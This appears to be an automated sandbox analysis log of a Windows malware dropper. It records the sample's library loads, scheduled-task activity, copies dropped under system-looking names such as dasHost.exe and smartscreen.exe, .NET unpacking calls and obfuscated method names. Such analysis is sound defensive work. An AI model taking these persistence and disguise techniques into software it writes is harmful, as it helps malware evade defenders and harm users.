Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Recovery\dasHost.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Recovery\dasHost.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Recovery\dasHost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Recovery\dasHost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Recovery\dasHost.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Recovery\dasHost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Recovery\dasHost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Recovery\dasHost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Recovery\dasHost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Recovery\dasHost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Recovery\dasHost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Recovery\dasHost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Recovery\dasHost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Recovery\dasHost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Recovery\dasHost.exe	Section loaded: mscoree.dll
Source: C:\Recovery\dasHost.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\dasHost.exe	Section loaded: version.dll
Source: C:\Recovery\dasHost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\dasHost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\dasHost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\dasHost.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\dasHost.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\dasHost.exe	Section loaded: wldp.dll
Source: C:\Recovery\dasHost.exe	Section loaded: profapi.dll
Source: C:\Recovery\dasHost.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\dasHost.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\dasHost.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\dasHost.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Section loaded: sspicli.dll

Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: QoRXFaE8Xn.exe

Static file information: File size 1164970 > 1048576

Source: QoRXFaE8Xn.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: QoRXFaE8Xn.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: QoRXFaE8Xn.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: QoRXFaE8Xn.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: QoRXFaE8Xn.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: QoRXFaE8Xn.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: QoRXFaE8Xn.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: QoRXFaE8Xn.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: QoRXFaE8Xn.exe

Source: QoRXFaE8Xn.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: QoRXFaE8Xn.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: QoRXFaE8Xn.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: QoRXFaE8Xn.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: QoRXFaE8Xn.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, mAKywZp8ToODWUb1CfN.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.3.QoRXFaE8Xn.exe.661054d.0.raw.unpack, mAKywZp8ToODWUb1CfN.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, J7xdp4aV7EccN0InGkm.cs	.Net Code: C2Cs30Ym3D System.AppDomain.Load(byte[])
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, J7xdp4aV7EccN0InGkm.cs	.Net Code: C2Cs30Ym3D System.Reflection.Assembly.Load(byte[])
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, J7xdp4aV7EccN0InGkm.cs	.Net Code: C2Cs30Ym3D
Source: 0.3.QoRXFaE8Xn.exe.661054d.0.raw.unpack, J7xdp4aV7EccN0InGkm.cs	.Net Code: C2Cs30Ym3D System.AppDomain.Load(byte[])
Source: 0.3.QoRXFaE8Xn.exe.661054d.0.raw.unpack, J7xdp4aV7EccN0InGkm.cs	.Net Code: C2Cs30Ym3D System.Reflection.Assembly.Load(byte[])
Source: 0.3.QoRXFaE8Xn.exe.661054d.0.raw.unpack, J7xdp4aV7EccN0InGkm.cs	.Net Code: C2Cs30Ym3D

Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe

File created: C:\PortcomAgentwinbroker\__tmp_rar_sfx_access_check_6277796

Jump to behavior

Source: QoRXFaE8Xn.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008DE28C push eax; ret	0_2_008DE2AA
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008DED46 push ecx; ret	0_2_008DED59
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Code function: 5_2_00007FF848F100BD pushad ; iretd	5_2_00007FF848F100C1
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Code function: 18_2_00007FF848F300BD pushad ; iretd	18_2_00007FF848F300C1
Source: C:\Recovery\dasHost.exe	Code function: 19_2_00007FF848F400BD pushad ; iretd	19_2_00007FF848F400C1
Source: C:\Recovery\dasHost.exe	Code function: 20_2_00007FF848F300BD pushad ; iretd	20_2_00007FF848F300C1
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Code function: 21_2_00007FF848F100BD pushad ; iretd	21_2_00007FF848F100C1
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Code function: 22_2_00007FF848F100BD pushad ; iretd	22_2_00007FF848F100C1
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Code function: 23_2_00007FF848F300BD pushad ; iretd	23_2_00007FF848F300C1
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Code function: 24_2_00007FF848F400BD pushad ; iretd	24_2_00007FF848F400C1

Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, h7KuBc3LQUfESvvcemy.cs	High entropy of concatenated method names: 'PGgTysxq8Z', '_1kO', '_9v4', '_294', 'sDyTplbraC', 'euj', 'gN9T9YteT0', 'cDWT7EVyEs', 'o87', 'BLZTWejQjC'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, R4q7v6v0nntRDId91AH.cs	High entropy of concatenated method names: 'nHxjPHD1FH', 'PD5aKPaSuyjMoAtwOF9', 'XsLXcmaRWlaSwiAGrKM', 'ASKD7XanatPRsOJ8feF', 'EN1PoNaYMaq0jZuMSdB', 'RYnfSWF5WU', 'jJmfmJB0wY', 'uWOfQm6VcK', 'BCofaRiLrg', 'oGVf8s5y5U'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, UoByMkKcPf1uQiga4V.cs	High entropy of concatenated method names: 'eUB9OtAvd', 'h9e792YQ8', 'VeQWKuNK9', 'GgIdICVPU', 'DaFnD5Vrq', 'zA1xSV52n', 'TwNT0w0SR', 'GmDEPu4ZXhCtyv6C06e', 'INLGW54T3Fp8QeLHu9I', 'SD9Ieq45l3lHupjkt3N'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, G2E0nV33cp0wpRAHKfx.cs	High entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, vjAnuZaWFEIT1CsIXPC.cs	High entropy of concatenated method names: 'bjdNEPaUJ7', 'iaTN3cxBX1', 'Ji7X7Nsi0UGnUTDn2uc', 'MErXGfsa4AoSirPRwA4', 'UWHKT0suo1s2XBNPsde', 'RkO55csP8wnnSKdEmZp', 'RcboG1sVsdnxMd1Pjrx', 'g96qQcsNwea6SAoawH8', 'kxxnlosCEfIW9EXoha7', 'bNZK8ws7iDTKs184lQW'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, S7gjlrmUJH4l3jWHihH.cs	High entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'Gb2f7rcjdLnfCWGtYls', 'hyjpv0chU04dU53rmCE', 'TIrgujc1jeHcGZmaxPH', 'hEAvjscQoBW0aIOhJ0y', 'w57kjkc2jNAiiMdUEKD', 'kf1EesckdEw0gbhHgQY'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, Fgkt7hmAcJy1rP8K5dc.cs	High entropy of concatenated method names: 'WBd0OtSG8i', 'NCp00tbtnK', 'ylr0s9fCZQ', 'eVh6e05DeyamNUHdE7r', 'NqJg9w5MRedP6ibFWj4', 'n2EBrZ5GC47TDutBDTq', 'v9M2Hw5JYT4oHHWm0Lr', 'CZQgBI5toyNRdwNcjJT', 'NTOrrO5vcGaw0rpvYWI', 'EkbvLy5I38jPtufPYNY'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, vqiRgQ3tsBxcdnij8db.cs	High entropy of concatenated method names: 'IGD', 'CV5', 'bdfW9tTGV2', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, wvOcNu0s05ICoKMJ6B2.cs	High entropy of concatenated method names: 'gY57NHYUOh', 'pyd76fVvF5', 'dhd7iAIHel', 'jmX7H8Yh8b', 'xv97Lokhm2', 'R8q7h4aw7u', 'Hfp7fGMre6', 'tVm7r8vvgX', 'SOu7jCSW9P', 'kEk7emspME'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, hXOLjUvH8rI4GvM2VP7.cs	High entropy of concatenated method names: 'PiYjtiH161', 'LPIjo53bFi', 'S4sjAaH7lH', 'RLqj17Hjl6', 'Iu0jcuOxKV', 'soF6JXaO8xeYGM85PNB', 'nryrnrazxSsg10as8h1', 'Xx2Soma8W4de16YYNXW', 'm4ZJ1Ba3qvrFneZWoWN', 'La1EeOVWc617JC6pdoA'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, JSqMTRmjhU553FeO9NC.cs	High entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'sJsKtaZO5DXgavFp6fA', 'DcJ1xSZzWI8qH1rYE1B', 'B9rTR7TWC412OnlP1Lb', 'eU4EmwT4s2DdMoj4Txh', 'Aa2IekTKxndjdjdWRAR', 'hEZTIMTeMki89QQlkXX'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, CwRd4FakWbjZp88G3XZ.cs	High entropy of concatenated method names: 'fcRs5E8vMe', 'Ucwbyk9ebAgZk4E7C3c', 'w0Fsuy9r0iTn4CiKvhK', 'TCVPNR948kFiBy5IqUH', 'oE8bde9KIJFt9jB63gC', 'PEvlG19lCNfsGSTF4in', 'uIo7tM90n80nQLYy7yo', 'MqbiWr9XfkYOy7l2NYk', 'efT1rV9Z5Iyiuy5finK', 'YgL8VQ9T5dXscU50MQh'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, oD6sT2axdNXYR7fBHAZ.cs	High entropy of concatenated method names: 'UGJsz3r3eo', 'GumNJxWoKr', 'OfXNOBcSsu', 'YyxN0aOHUe', 'CdGNsTmRhn', 'rvuNN3iGbJ', 'aJVN6DTHkE', 'PwdNiSr10q', 'PL4NHIwnIw', 'CP5NLyweyX'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, lHtGIVEYkvj5eBhqt7J.cs	High entropy of concatenated method names: 'PqBLGQI068', 'DYELumpwBY', 'D89L4JTnZy', 'R8EGdnfmpv9iW4mOV5A', 'RQ41l4fovh8fQZmOw8b', 'GXeuNdfAYKDBiywaPIM', 'm3dMJMfG5poy5wLsaX3', 'yYC9LDfJy2hT15NECbK', 'H4xTVCfDinr5P86kwEE', 'FfQgfvfM65RfAJ16sf3'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, hqKs4Fey5RjmRVB4tV.cs	High entropy of concatenated method names: '_88Z', 'YZ8', 'ffV', 'G9C', 'silxGKlLK0t0rW9oZcm', 'GalRXelm7KhrFyD8lOe', 'dMcNvuloFpbaOojMvkR', 's41g9nlAwIUr1ynJHK4', 'qC0QOFlGgY4RVeZEeXB', 'Qj8gMHlJfnflta79MQj'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, NpvDdMmO8MSYg45VK5k.cs	High entropy of concatenated method names: 'emu0roMsju', 'S1T0jMG98q', 'fDCES8cgpqk0uolZBXe', 'QS7RtHc5ZB10pS1eqlp', 'Yy7UMPccCqMJrDKcVvh', 'rSRSNZcw8MrhRWeKRIP', 'blZ1B4cU9nL8fSXpjJF', 'zEo5q8c9y0q32T5q2Sk', 'J9iFmvcs1ZD4DOKUc4l', 'ubdhnwcE2vw06GiaUTB'
